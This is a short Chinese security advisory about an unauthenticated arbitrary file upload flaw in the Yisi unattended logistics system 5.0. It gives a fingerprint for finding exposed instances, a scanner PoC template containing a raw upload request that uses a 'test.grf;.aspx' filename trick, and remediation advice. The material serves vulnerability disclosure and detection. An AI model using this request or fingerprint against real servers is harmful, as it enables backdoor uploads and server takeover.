本文由掌控安全学院 - 江月 投稿
【产品介绍】
易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。
【漏洞描述】
易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
【影响范围】
易思智能物流无人值守系统5.0
【指纹】
web.body=”智能物流无人值守系统”
【Poc检测】
【验证】
【Yakit Poc自动化验证】
id: Yisi-upload
info:
name: Yisi-upload
author: hack
severity: info
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |
POST /Sys_ReportFile/ImportReport?encode=hack HTTP/1.1
Host: {{Hostname}}
X-File-Name: test.grf
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 207
------WebKitFormBoundaryxzUhGld6cusN3Alk
Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
Content-Type: application/octet-stream
test
------WebKitFormBoundaryxzUhGld6cusN3Alk--
matchers-condition: and
matchers:
- type: word
part: body
words:
- Custom
- type: status
status:
- 200
【修复建议】
对上传文件的类型、大小、文件名等进行验证,确保只允许上传合法的文件类型,并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。
及时关注和应用厂商发布的安全补丁和更新,修复已知的文件上传漏洞。
没看够?欢迎关注
